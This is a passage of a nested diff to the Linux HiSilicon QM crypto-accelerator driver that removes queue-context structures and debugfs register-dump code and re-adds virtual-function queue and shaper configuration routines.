+-struct qm_aeqe {
+-	__le32 dw0;
+-};
+-
+-struct qm_sqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le16 w8;
+-	__le16 rsvd0;
+-	__le16 pasid;
+-	__le16 w11;
+-	__le16 cq_num;
+-	__le16 w13;
+-	__le32 rsvd1;
+-};
+-
+-struct qm_cqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le16 w8;
+-	__le16 rsvd0;
+-	__le16 pasid;
+-	__le16 w11;
+-	__le32 dw6;
+-	__le32 rsvd1;
+-};
+-
+-struct qm_eqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le32 rsvd[2];
+-	__le32 dw6;
+-};
+-
+-struct qm_aeqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le32 rsvd[2];
+-	__le32 dw6;
+-};
+-
+ struct qm_mailbox {
+ 	__le16 w0;
+ 	__le16 queue_num;
+@@ -467,25 +376,6 @@ struct hisi_qm_hw_ops {
+ 	int (*set_msi)(struct hisi_qm *qm, bool set);
+ };
+ 
+-struct qm_dfx_item {
+-	const char *name;
+-	u32 offset;
+-};
+-
+-static struct qm_dfx_item qm_dfx_files[] = {
+-	{"err_irq", offsetof(struct qm_dfx, err_irq_cnt)},
+-	{"aeq_irq", offsetof(struct qm_dfx, aeq_irq_cnt)},
+-	{"abnormal_irq", offsetof(struct qm_dfx, abnormal_irq_cnt)},
+-	{"create_qp_err", offsetof(struct qm_dfx, create_qp_err_cnt)},
+-	{"mb_err", offsetof(struct qm_dfx, mb_err_cnt)},
+-};
+-
+-static const char * const qm_debug_file_name[] = {
+-	[CURRENT_QM]   = "current_qm",
+-	[CURRENT_Q]    = "current_q",
+-	[CLEAR_ENABLE] = "clear_enable",
+-};
+-
+ struct hisi_qm_hw_error {
+ 	u32 int_msk;
+ 	const char *msg;
+@@ -510,23 +400,6 @@ static const struct hisi_qm_hw_error qm_hw_error[] = {
+ 	{ /* sentinel */ }
+ };
+ 
+-/* define the QM's dfx regs region and region length */
+-static struct dfx_diff_registers qm_diff_regs[] = {
+-	{
+-		.reg_offset = QM_DFX_BASE,
+-		.reg_len = QM_DFX_BASE_LEN,
+-	}, {
+-		.reg_offset = QM_DFX_STATE1,
+-		.reg_len = QM_DFX_STATE1_LEN,
+-	}, {
+-		.reg_offset = QM_DFX_STATE2,
+-		.reg_len = QM_DFX_STATE2_LEN,
+-	}, {
+-		.reg_offset = QM_DFX_COMMON,
+-		.reg_len = QM_DFX_COMMON_LEN,
+-	},
+-};
+-
+ static const char * const qm_db_timeout[] = {
+ 	"sq", "cq", "eq", "aeq",
+ };
+@@ -535,10 +408,6 @@ static const char * const qm_fifo_overflow[] = {
+ 	"cq", "eq", "aeq",
+ };
+ 
+-static const char * const qm_s[] = {
+-	"init", "start", "close", "stop",
+-};
+-
+ static const char * const qp_s[] = {
+ 	"none", "init", "start", "stop", "close",
+ };
+@@ -1324,999 +1193,158 @@ static void qm_vft_data_cfg(struct hisi_qm *qm, enum vft_type type, u32 base,
+ 				tmp = QM_CQC_VFT_VALID;
+ 			}
+ 			break;
+-		case SHAPER_VFT:
+-			if (factor) {
+-				tmp = factor->cir_b |
+-				(factor->cir_u << QM_SHAPER_FACTOR_CIR_U_SHIFT) |
+-				(factor->cir_s << QM_SHAPER_FACTOR_CIR_S_SHIFT) |
+-				(QM_SHAPER_CBS_B << QM_SHAPER_FACTOR_CBS_B_SHIFT) |
+-				(factor->cbs_s << QM_SHAPER_FACTOR_CBS_S_SHIFT);
+-			}
+-			break;
+-		}
+-	}
+-
+-	writel(lower_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_L);
+-	writel(upper_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_H);
+-}
+-
+-static int qm_set_vft_common(struct hisi_qm *qm, enum vft_type type,
+-			     u32 fun_num, u32 base, u32 number)
+-{
+-	struct qm_shaper_factor *factor = NULL;
+-	unsigned int val;
+-	int ret;
+-
+-	if (type == SHAPER_VFT && test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
+-		factor = &qm->factor[fun_num];
+-
+-	ret = readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
+-					 val & BIT(0), POLL_PERIOD,
+-					 POLL_TIMEOUT);
+-	if (ret)
+-		return ret;
+-
+-	writel(0x0, qm->io_base + QM_VFT_CFG_OP_WR);
+-	writel(type, qm->io_base + QM_VFT_CFG_TYPE);
+-	if (type == SHAPER_VFT)
+-		fun_num |= base << QM_SHAPER_VFT_OFFSET;
+-
+-	writel(fun_num, qm->io_base + QM_VFT_CFG);
+-
+-	qm_vft_data_cfg(qm, type, base, number, factor);
+-
+-	writel(0x0, qm->io_base + QM_VFT_CFG_RDY);
+-	writel(0x1, qm->io_base + QM_VFT_CFG_OP_ENABLE);
+-
+-	return readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
+-					  val & BIT(0), POLL_PERIOD,
+-					  POLL_TIMEOUT);
+-}
+-
+-static int qm_shaper_init_vft(struct hisi_qm *qm, u32 fun_num)
+-{
+-	u32 qos = qm->factor[fun_num].func_qos;
+-	int ret, i;
+-
+-	ret = qm_get_shaper_para(qos * QM_QOS_RATE, &qm->factor[fun_num]);
+-	if (ret) {
+-		dev_err(&qm->pdev->dev, "failed to calculate shaper parameter!\n");
+-		return ret;
+-	}
+-	writel(qm->type_rate, qm->io_base + QM_SHAPER_CFG);
+-	for (i = ALG_TYPE_0; i <= ALG_TYPE_1; i++) {
+-		/* The base number of queue reuse for different alg type */
+-		ret = qm_set_vft_common(qm, SHAPER_VFT, fun_num, i, 1);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+-/* The config should be conducted after qm_dev_mem_reset() */
+-static int qm_set_sqc_cqc_vft(struct hisi_qm *qm, u32 fun_num, u32 base,
+-			      u32 number)
+-{
+-	int ret, i;
+-
+-	for (i = SQC_VFT; i <= CQC_VFT; i++) {
+-		ret = qm_set_vft_common(qm, i, fun_num, base, number);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	/* init default shaper qos val */
+-	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps)) {
+-		ret = qm_shaper_init_vft(qm, fun_num);
+-		if (ret)
+-			goto back_sqc_cqc;
+-	}
+-
+-	return 0;
+-back_sqc_cqc:
+-	for (i = SQC_VFT; i <= CQC_VFT; i++)
+-		qm_set_vft_common(qm, i, fun_num, 0, 0);
+-
+-	return ret;
+-}
+-
+-static int qm_get_vft_v2(struct hisi_qm *qm, u32 *base, u32 *number)
+-{
+-	u64 sqc_vft;
+-	int ret;
+-
+-	ret = hisi_qm_mb(qm, QM_MB_CMD_SQC_VFT_V2, 0, 0, 1);
+-	if (ret)
+-		return ret;
+-
+-	sqc_vft = readl(qm->io_base + QM_MB_CMD_DATA_ADDR_L) |
+-		  ((u64)readl(qm->io_base + QM_MB_CMD_DATA_ADDR_H) << 32);
+-	*base = QM_SQC_VFT_BASE_MASK_V2 & (sqc_vft >> QM_SQC_VFT_BASE_SHIFT_V2);
+-	*number = (QM_SQC_VFT_NUM_MASK_v2 &
+-		   (sqc_vft >> QM_SQC_VFT_NUM_SHIFT_V2)) + 1;
+-
+-	return 0;
+-}
+-
+-static int qm_get_vf_qp_num(struct hisi_qm *qm, u32 fun_num)
+-{
+-	u32 remain_q_num, vfq_num;
+-	u32 num_vfs = qm->vfs_num;
+-
+-	vfq_num = (qm->ctrl_qp_num - qm->qp_num) / num_vfs;
+-	if (vfq_num >= qm->max_qp_num)
+-		return qm->max_qp_num;
+-
+-	remain_q_num = (qm->ctrl_qp_num - qm->qp_num) % num_vfs;
+-	if (vfq_num + remain_q_num <= qm->max_qp_num)
+-		return fun_num == num_vfs ? vfq_num + remain_q_num : vfq_num;
+-
+-	/*
+-	 * if vfq_num + remain_q_num > max_qp_num, the last VFs,
+-	 * each with one more queue.
+-	 */
+-	return fun_num + remain_q_num > num_vfs ? vfq_num + 1 : vfq_num;
+-}
+-
+-static struct hisi_qm *file_to_qm(struct debugfs_file *file)
+-{
+-	struct qm_debug *debug = file->debug;
+-
+-	return container_of(debug, struct hisi_qm, debug);
+-}
+-
+-static u32 current_q_read(struct hisi_qm *qm)
+-{
+-	return readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) >> QM_DFX_QN_SHIFT;
+-}
+-
+-static int current_q_write(struct hisi_qm *qm, u32 val)
+-{
+-	u32 tmp;
+-
+-	if (val >= qm->debug.curr_qm_qp_num)
+-		return -EINVAL;
+-
+-	tmp = val << QM_DFX_QN_SHIFT |
+-	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_FUN_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
+-
+-	tmp = val << QM_DFX_QN_SHIFT |
+-	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_FUN_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
+-
+-	return 0;
+-}
+-
+-static u32 clear_enable_read(struct hisi_qm *qm)
+-{
+-	return readl(qm->io_base + QM_DFX_CNT_CLR_CE);
+-}
+-
+-/* rd_clr_ctrl 1 enable read clear, otherwise 0 disable it */
+-static int clear_enable_write(struct hisi_qm *qm, u32 rd_clr_ctrl)
+-{
+-	if (rd_clr_ctrl > 1)
+-		return -EINVAL;
+-
+-	writel(rd_clr_ctrl, qm->io_base + QM_DFX_CNT_CLR_CE);
+-
+-	return 0;
+-}
+-
+-static u32 current_qm_read(struct hisi_qm *qm)
+-{
+-	return readl(qm->io_base + QM_DFX_MB_CNT_VF);
+-}
+-
+-static int current_qm_write(struct hisi_qm *qm, u32 val)
+-{
+-	u32 tmp;
+-
+-	if (val > qm->vfs_num)
+-		return -EINVAL;
+-
+-	/* According PF or VF Dev ID to calculation curr_qm_qp_num and store */
+-	if (!val)
+-		qm->debug.curr_qm_qp_num = qm->qp_num;
+-	else
+-		qm->debug.curr_qm_qp_num = qm_get_vf_qp_num(qm, val);
+-
+-	writel(val, qm->io_base + QM_DFX_MB_CNT_VF);
+-	writel(val, qm->io_base + QM_DFX_DB_CNT_VF);
+-
+-	tmp = val |
+-	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_Q_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
+-
+-	tmp = val |
+-	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_Q_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
+-
+-	return 0;
+-}
+-
+-static ssize_t qm_debug_read(struct file *filp, char __user *buf,
+-			     size_t count, loff_t *pos)
+-{
+-	struct debugfs_file *file = filp->private_data;
+-	enum qm_debug_file index = file->index;
+-	struct hisi_qm *qm = file_to_qm(file);
+-	char tbuf[QM_DBG_TMP_BUF_LEN];
+-	u32 val;
+-	int ret;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return ret;
+-
+-	mutex_lock(&file->lock);
+-	switch (index) {
+-	case CURRENT_QM:
+-		val = current_qm_read(qm);
+-		break;
+-	case CURRENT_Q:
+-		val = current_q_read(qm);
+-		break;
+-	case CLEAR_ENABLE:
+-		val = clear_enable_read(qm);
+-		break;
+-	default:
+-		goto err_input;
+-	}
+-	mutex_unlock(&file->lock);
+-
+-	hisi_qm_put_dfx_access(qm);
+-	ret = scnprintf(tbuf, QM_DBG_TMP_BUF_LEN, "%u\n", val);
+-	return simple_read_from_buffer(buf, count, pos, tbuf, ret);
+-
+-err_input:
+-	mutex_unlock(&file->lock);
+-	hisi_qm_put_dfx_access(qm);
+-	return -EINVAL;
+-}
+-
+-static ssize_t qm_debug_write(struct file *filp, const char __user *buf,
+-			      size_t count, loff_t *pos)
+-{
+-	struct debugfs_file *file = filp->private_data;
+-	enum qm_debug_file index = file->index;
+-	struct hisi_qm *qm = file_to_qm(file);
+-	unsigned long val;
+-	char tbuf[QM_DBG_TMP_BUF_LEN];
+-	int len, ret;
+-
+-	if (*pos != 0)
+-		return 0;
+-
+-	if (count >= QM_DBG_TMP_BUF_LEN)
+-		return -ENOSPC;
+-
+-	len = simple_write_to_buffer(tbuf, QM_DBG_TMP_BUF_LEN - 1, pos, buf,
+-				     count);
+-	if (len < 0)
+-		return len;
+-
+-	tbuf[len] = '\0';
+-	if (kstrtoul(tbuf, 0, &val))
+-		return -EFAULT;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return ret;
+-
+-	mutex_lock(&file->lock);
+-	switch (index) {
+-	case CURRENT_QM:
+-		ret = current_qm_write(qm, val);
+-		break;
+-	case CURRENT_Q:
+-		ret = current_q_write(qm, val);
+-		break;
+-	case CLEAR_ENABLE:
+-		ret = clear_enable_write(qm, val);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-	}
+-	mutex_unlock(&file->lock);
+-
+-	hisi_qm_put_dfx_access(qm);
+-
+-	if (ret)
+-		return ret;
+-
+-	return count;
+-}
+-
+-static const struct file_operations qm_debug_fops = {
+-	.owner = THIS_MODULE,
+-	.open = simple_open,
+-	.read = qm_debug_read,
+-	.write = qm_debug_write,
+-};
+-
+-#define CNT_CYC_REGS_NUM		10
+-static const struct debugfs_reg32 qm_dfx_regs[] = {
+-	/* XXX_CNT are reading clear register */
+-	{"QM_ECC_1BIT_CNT               ",  0x104000ull},
+-	{"QM_ECC_MBIT_CNT               ",  0x104008ull},
+-	{"QM_DFX_MB_CNT                 ",  0x104018ull},
+-	{"QM_DFX_DB_CNT                 ",  0x104028ull},
+-	{"QM_DFX_SQE_CNT                ",  0x104038ull},
+-	{"QM_DFX_CQE_CNT                ",  0x104048ull},
+-	{"QM_DFX_SEND_SQE_TO_ACC_CNT    ",  0x104050ull},
+-	{"QM_DFX_WB_SQE_FROM_ACC_CNT    ",  0x104058ull},
+-	{"QM_DFX_ACC_FINISH_CNT         ",  0x104060ull},
+-	{"QM_DFX_CQE_ERR_CNT            ",  0x1040b4ull},
+-	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
+-	{"QM_ECC_1BIT_INF               ",  0x104004ull},
+-	{"QM_ECC_MBIT_INF               ",  0x10400cull},
+-	{"QM_DFX_ACC_RDY_VLD0           ",  0x1040a0ull},
+-	{"QM_DFX_ACC_RDY_VLD1           ",  0x1040a4ull},
+-	{"QM_DFX_AXI_RDY_VLD            ",  0x1040a8ull},
+-	{"QM_DFX_FF_ST0                 ",  0x1040c8ull},
+-	{"QM_DFX_FF_ST1                 ",  0x1040ccull},
+-	{"QM_DFX_FF_ST2                 ",  0x1040d0ull},
+-	{"QM_DFX_FF_ST3                 ",  0x1040d4ull},
+-	{"QM_DFX_FF_ST4                 ",  0x1040d8ull},
+-	{"QM_DFX_FF_ST5                 ",  0x1040dcull},
+-	{"QM_DFX_FF_ST6                 ",  0x1040e0ull},
+-	{"QM_IN_IDLE_ST                 ",  0x1040e4ull},
+-};
+-
+-static const struct debugfs_reg32 qm_vf_dfx_regs[] = {
+-	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
+-};
+-
+-/**
+- * hisi_qm_regs_dump() - Dump registers's value.
+- * @s: debugfs file handle.
+- * @regset: accelerator registers information.
+- *
+- * Dump accelerator registers.
+- */
+-void hisi_qm_regs_dump(struct seq_file *s, struct debugfs_regset32 *regset)
+-{
+-	struct pci_dev *pdev = to_pci_dev(regset->dev);
+-	struct hisi_qm *qm = pci_get_drvdata(pdev);
+-	const struct debugfs_reg32 *regs = regset->regs;
+-	int regs_len = regset->nregs;
+-	int i, ret;
+-	u32 val;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return;
+-
+-	for (i = 0; i < regs_len; i++) {
+-		val = readl(regset->base + regs[i].offset);
+-		seq_printf(s, "%s= 0x%08x\n", regs[i].name, val);
+-	}
+-
+-	hisi_qm_put_dfx_access(qm);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_regs_dump);
+-
+-static int qm_regs_show(struct seq_file *s, void *unused)
+-{
+-	struct hisi_qm *qm = s->private;
+-	struct debugfs_regset32 regset;
+-
+-	if (qm->fun_type == QM_HW_PF) {
+-		regset.regs = qm_dfx_regs;
+-		regset.nregs = ARRAY_SIZE(qm_dfx_regs);
+-	} else {
+-		regset.regs = qm_vf_dfx_regs;
+-		regset.nregs = ARRAY_SIZE(qm_vf_dfx_regs);
+-	}
+-
+-	regset.base = qm->io_base;
+-	regset.dev = &qm->pdev->dev;
+-
+-	hisi_qm_regs_dump(s, &regset);
+-
+-	return 0;
+-}
+-
+-DEFINE_SHOW_ATTRIBUTE(qm_regs);
+-
+-static struct dfx_diff_registers *dfx_regs_init(struct hisi_qm *qm,
+-	const struct dfx_diff_registers *cregs, int reg_len)
+-{
+-	struct dfx_diff_registers *diff_regs;
+-	u32 j, base_offset;
+-	int i;
+-
+-	diff_regs = kcalloc(reg_len, sizeof(*diff_regs), GFP_KERNEL);
+-	if (!diff_regs)
+-		return ERR_PTR(-ENOMEM);
+-
+-	for (i = 0; i < reg_len; i++) {
+-		if (!cregs[i].reg_len)
+-			continue;
+-
+-		diff_regs[i].reg_offset = cregs[i].reg_offset;
+-		diff_regs[i].reg_len = cregs[i].reg_len;
+-		diff_regs[i].regs = kcalloc(QM_DFX_REGS_LEN, cregs[i].reg_len,
+-					 GFP_KERNEL);
+-		if (!diff_regs[i].regs)
+-			goto alloc_error;
+-
+-		for (j = 0; j < diff_regs[i].reg_len; j++) {
+-			base_offset = diff_regs[i].reg_offset +
+-					j * QM_DFX_REGS_LEN;
+-			diff_regs[i].regs[j] = readl(qm->io_base + base_offset);
+-		}
+-	}
+-
+-	return diff_regs;
+-
+-alloc_error:
+-	while (i > 0) {
+-		i--;
+-		kfree(diff_regs[i].regs);
+-	}
+-	kfree(diff_regs);
+-	return ERR_PTR(-ENOMEM);
+-}
+-
+-static void dfx_regs_uninit(struct hisi_qm *qm,
+-		struct dfx_diff_registers *dregs, int reg_len)
+-{
+-	int i;
+-
+-	/* Setting the pointer is NULL to prevent double free */
+-	for (i = 0; i < reg_len; i++) {
+-		kfree(dregs[i].regs);
+-		dregs[i].regs = NULL;
+-	}
+-	kfree(dregs);
+-	dregs = NULL;
+-}
+-
+-/**
+- * hisi_qm_diff_regs_init() - Allocate memory for registers.
+- * @qm: device qm handle.
+- * @dregs: diff registers handle.
+- * @reg_len: diff registers region length.
+- */
+-int hisi_qm_diff_regs_init(struct hisi_qm *qm,
+-		struct dfx_diff_registers *dregs, int reg_len)
+-{
+-	if (!qm || !dregs || reg_len <= 0)
+-		return -EINVAL;
+-
+-	if (qm->fun_type != QM_HW_PF)
+-		return 0;
+-
+-	qm->debug.qm_diff_regs = dfx_regs_init(qm, qm_diff_regs,
+-						ARRAY_SIZE(qm_diff_regs));
+-	if (IS_ERR(qm->debug.qm_diff_regs))
+-		return PTR_ERR(qm->debug.qm_diff_regs);
+-
+-	qm->debug.acc_diff_regs = dfx_regs_init(qm, dregs, reg_len);
+-	if (IS_ERR(qm->debug.acc_diff_regs)) {
+-		dfx_regs_uninit(qm, qm->debug.qm_diff_regs,
+-				ARRAY_SIZE(qm_diff_regs));
+-		return PTR_ERR(qm->debug.acc_diff_regs);
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_diff_regs_init);
+-
+-/**
+- * hisi_qm_diff_regs_uninit() - Free memory for registers.
+- * @qm: device qm handle.
+- * @reg_len: diff registers region length.
+- */
+-void hisi_qm_diff_regs_uninit(struct hisi_qm *qm, int reg_len)
+-{
+-	if (!qm  || reg_len <= 0 || qm->fun_type != QM_HW_PF)
+-		return;
+-
+-	dfx_regs_uninit(qm, qm->debug.acc_diff_regs, reg_len);
+-	dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_diff_regs_uninit);
+-
+-/**
+- * hisi_qm_acc_diff_regs_dump() - Dump registers's value.
+- * @qm: device qm handle.
+- * @s: Debugfs file handle.
+- * @dregs: diff registers handle.
+- * @regs_len: diff registers region length.
+- */
+-void hisi_qm_acc_diff_regs_dump(struct hisi_qm *qm, struct seq_file *s,
+-	struct dfx_diff_registers *dregs, int regs_len)
+-{
+-	u32 j, val, base_offset;
+-	int i, ret;
+-
+-	if (!qm || !s || !dregs || regs_len <= 0)
+-		return;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return;
+-
+-	down_read(&qm->qps_lock);
+-	for (i = 0; i < regs_len; i++) {
+-		if (!dregs[i].reg_len)
+-			continue;
+-
+-		for (j = 0; j < dregs[i].reg_len; j++) {
+-			base_offset = dregs[i].reg_offset + j * QM_DFX_REGS_LEN;
+-			val = readl(qm->io_base + base_offset);
+-			if (val != dregs[i].regs[j])
+-				seq_printf(s, "0x%08x = 0x%08x ---> 0x%08x\n",
+-					   base_offset, dregs[i].regs[j], val);
+-		}
+-	}
+-	up_read(&qm->qps_lock);
+-
+-	hisi_qm_put_dfx_access(qm);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_acc_diff_regs_dump);
+-
+-static int qm_diff_regs_show(struct seq_file *s, void *unused)
+-{
+-	struct hisi_qm *qm = s->private;
+-
+-	hisi_qm_acc_diff_regs_dump(qm, s, qm->debug.qm_diff_regs,
+-					ARRAY_SIZE(qm_diff_regs));
+-
+-	return 0;
+-}
+-DEFINE_SHOW_ATTRIBUTE(qm_diff_regs);
+-
+-static ssize_t qm_cmd_read(struct file *filp, char __user *buffer,
+-			   size_t count, loff_t *pos)
+-{
+-	char buf[QM_DBG_READ_LEN];
+-	int len;
+-
+-	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n",
+-			"Please echo help to cmd to get help information");
+-
+-	return simple_read_from_buffer(buffer, count, pos, buf, len);
+-}
+-
+-static void *qm_ctx_alloc(struct hisi_qm *qm, size_t ctx_size,
+-			  dma_addr_t *dma_addr)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	void *ctx_addr;
+-
+-	ctx_addr = kzalloc(ctx_size, GFP_KERNEL);
+-	if (!ctx_addr)
+-		return ERR_PTR(-ENOMEM);
+-
+-	*dma_addr = dma_map_single(dev, ctx_addr, ctx_size, DMA_FROM_DEVICE);
+-	if (dma_mapping_error(dev, *dma_addr)) {
+-		dev_err(dev, "DMA mapping error!\n");
+-		kfree(ctx_addr);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	return ctx_addr;
+-}
+-
+-static void qm_ctx_free(struct hisi_qm *qm, size_t ctx_size,
+-			const void *ctx_addr, dma_addr_t *dma_addr)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-
+-	dma_unmap_single(dev, *dma_addr, ctx_size, DMA_FROM_DEVICE);
+-	kfree(ctx_addr);
+-}
+-
+-static void dump_show(struct hisi_qm *qm, void *info,
+-		     unsigned int info_size, char *info_name)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	u8 *info_curr = info;
+-	u32 i;
+-#define BYTE_PER_DW	4
+-
+-	dev_info(dev, "%s DUMP\n", info_name);
+-	for (i = 0; i < info_size; i += BYTE_PER_DW, info_curr += BYTE_PER_DW) {
+-		pr_info("DW%u: %02X%02X %02X%02X\n", i / BYTE_PER_DW,
+-			*(info_curr + 3), *(info_curr + 2), *(info_curr + 1), *(info_curr));
+-	}
+-}
+-
+-static int qm_dump_sqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
+-{
+-	return hisi_qm_mb(qm, QM_MB_CMD_SQC, dma_addr, qp_id, 1);
+-}
+-
+-static int qm_dump_cqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
+-{
+-	return hisi_qm_mb(qm, QM_MB_CMD_CQC, dma_addr, qp_id, 1);
+-}
+-
+-static int qm_sqc_dump(struct hisi_qm *qm, const char *s)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	struct qm_sqc *sqc, *sqc_curr;
+-	dma_addr_t sqc_dma;
+-	u32 qp_id;
+-	int ret;
+-
+-	if (!s)
+-		return -EINVAL;
+-
+-	ret = kstrtou32(s, 0, &qp_id);
+-	if (ret || qp_id >= qm->qp_num) {
+-		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
+-		return -EINVAL;
+-	}
+-
+-	sqc = qm_ctx_alloc(qm, sizeof(*sqc), &sqc_dma);
+-	if (IS_ERR(sqc))
+-		return PTR_ERR(sqc);
+-
+-	ret = qm_dump_sqc_raw(qm, sqc_dma, qp_id);
+-	if (ret) {
+-		down_read(&qm->qps_lock);
+-		if (qm->sqc) {
+-			sqc_curr = qm->sqc + qp_id;
+-
+-			dump_show(qm, sqc_curr, sizeof(*sqc), "SOFT SQC");
+-		}
+-		up_read(&qm->qps_lock);
+-
+-		goto free_ctx;
+-	}
+-
+-	dump_show(qm, sqc, sizeof(*sqc), "SQC");
+-
+-free_ctx:
+-	qm_ctx_free(qm, sizeof(*sqc), sqc, &sqc_dma);
+-	return 0;
+-}
+-
+-static int qm_cqc_dump(struct hisi_qm *qm, const char *s)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	struct qm_cqc *cqc, *cqc_curr;
+-	dma_addr_t cqc_dma;
+-	u32 qp_id;
+-	int ret;
+-
+-	if (!s)
+-		return -EINVAL;
+-
+-	ret = kstrtou32(s, 0, &qp_id);
+-	if (ret || qp_id >= qm->qp_num) {
+-		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
+-		return -EINVAL;
+-	}
+-
+-	cqc = qm_ctx_alloc(qm, sizeof(*cqc), &cqc_dma);
+-	if (IS_ERR(cqc))
+-		return PTR_ERR(cqc);
+-
+-	ret = qm_dump_cqc_raw(qm, cqc_dma, qp_id);
+-	if (ret) {
+-		down_read(&qm->qps_lock);
+-		if (qm->cqc) {
+-			cqc_curr = qm->cqc + qp_id;
+-
+-			dump_show(qm, cqc_curr, sizeof(*cqc), "SOFT CQC");
+-		}
+-		up_read(&qm->qps_lock);
+-
+-		goto free_ctx;
+-	}
+-
+-	dump_show(qm, cqc, sizeof(*cqc), "CQC");
+-
+-free_ctx:
+-	qm_ctx_free(qm, sizeof(*cqc), cqc, &cqc_dma);
+-	return 0;
+-}
+-
+-static int qm_eqc_aeqc_dump(struct hisi_qm *qm, char *s, size_t size,
+-			    int cmd, char *name)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	dma_addr_t xeqc_dma;
+-	void *xeqc;
+-	int ret;
+-
+-	if (strsep(&s, " ")) {
+-		dev_err(dev, "Please do not input extra characters!\n");
+-		return -EINVAL;
+-	}
+-
+-	xeqc = qm_ctx_alloc(qm, size, &xeqc_dma);
+-	if (IS_ERR(xeqc))
+-		return PTR_ERR(xeqc);
+-
+-	ret = hisi_qm_mb(qm, cmd, xeqc_dma, 0, 1);
+-	if (ret)
+-		goto err_free_ctx;
+-
+-	dump_show(qm, xeqc, size, name);
+-
+-err_free_ctx:
+-	qm_ctx_free(qm, size, xeqc, &xeqc_dma);
+-	return ret;
+-}
+-
+-static int q_dump_param_parse(struct hisi_qm *qm, char *s,
+-			      u32 *e_id, u32 *q_id, u16 q_depth)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	unsigned int qp_num = qm->qp_num;
+-	char *presult;
+-	int ret;
+-
+-	presult = strsep(&s, " ");
+-	if (!presult) {
+-		dev_err(dev, "Please input qp number!\n");
+-		return -EINVAL;
+-	}
+-
+-	ret = kstrtou32(presult, 0, q_id);
+-	if (ret || *q_id >= qp_num) {
+-		dev_err(dev, "Please input qp num (0-%u)", qp_num - 1);
+-		return -EINVAL;
+-	}
+-
+-	presult = strsep(&s, " ");
+-	if (!presult) {
+-		dev_err(dev, "Please input sqe number!\n");
+-		return -EINVAL;
+-	}
+-
+-	ret = kstrtou32(presult, 0, e_id);
+-	if (ret || *e_id >= q_depth) {
+-		dev_err(dev, "Please input sqe num (0-%u)", q_depth - 1);
+-		return -EINVAL;
+-	}
+-
+-	if (strsep(&s, " ")) {
+-		dev_err(dev, "Please do not input extra characters!\n");
+-		return -EINVAL;
++		case SHAPER_VFT:
++			if (factor) {
++				tmp = factor->cir_b |
++				(factor->cir_u << QM_SHAPER_FACTOR_CIR_U_SHIFT) |
++				(factor->cir_s << QM_SHAPER_FACTOR_CIR_S_SHIFT) |
++				(QM_SHAPER_CBS_B << QM_SHAPER_FACTOR_CBS_B_SHIFT) |
++				(factor->cbs_s << QM_SHAPER_FACTOR_CBS_S_SHIFT);
++			}
++			break;
++		}
+ 	}
+ 
+-	return 0;
++	writel(lower_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_L);
++	writel(upper_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_H);
+ }
+ 
+-static int qm_sq_dump(struct hisi_qm *qm, char *s)
++static int qm_set_vft_common(struct hisi_qm *qm, enum vft_type type,
++			     u32 fun_num, u32 base, u32 number)
+ {
+-	u16 sq_depth = qm->qp_array->cq_depth;
+-	void *sqe, *sqe_curr;
+-	struct hisi_qp *qp;
+-	u32 qp_id, sqe_id;
++	struct qm_shaper_factor *factor = NULL;
++	unsigned int val;
+ 	int ret;
+ 
+-	ret = q_dump_param_parse(qm, s, &sqe_id, &qp_id, sq_depth);
++	if (type == SHAPER_VFT && test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
